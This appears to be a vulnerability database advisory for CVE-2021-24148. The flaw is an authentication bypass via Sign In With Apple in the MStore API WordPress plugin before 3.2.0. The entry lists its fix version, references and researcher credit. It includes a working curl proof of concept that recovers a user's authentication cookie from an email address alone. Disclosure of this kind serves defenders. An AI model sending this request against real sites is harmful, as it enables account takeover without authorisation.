MStore API < 3.2.0 – Authentication Bypass With Sign In With Apple | CVE 2021-24148 | Plugin Vulnerabilities

Description

The plugin had an authentication bypass with Sign In With Apple allowing unauthenticated users to recover an authentication cookie with only an email address.

Proof of Concept

The plugin must have a valid purchase code for the request to work

curl -X GET --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "email": "email@example.com" }' https://example.com/wp-json/api/flutter_user/apple_login

Affects Plugins

Fixed in 3.2.0

References

CVE

URL

https://blog.webble.fr/critical-authentication-bypass-in-mstore-api/

URL

https://www.notion.so/Changelog-7848b70b11cf4403893f1e2dd708345c

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Vincent Datrier

Submitter

Vincent Datrier

Verified

Yes

WPVDB ID

bf5ddc43-974d-41fa-8276-c1a27d3cc882

Timeline

Publicly Published

2021-02-02 (about 4 years ago)

Added

2021-02-02 (about 4 years ago)

Last Updated

2021-02-18 (about 4 years ago)

Other

Published

Title

Published

2025-12-12

Title

JAY Login & Register <= 2.4.01 - Authentication Bypass via Cookie

Published

2024-07-10

Title

profile-builder < 3.11.9 - Unauthenticated Privilege Escalation

Published

2025-03-04

Title

WP Real Estate Manager <= 2.8 - Authentication Bypass

Published

2025-12-15

Title

WPCOM Member < 1.7.17 - Authentication Bypass via Weak OTP

Published

2025-10-14

Title

Orion SMS OTP Verification <= 1.1.7 - Authentication Bypass via Account Takeover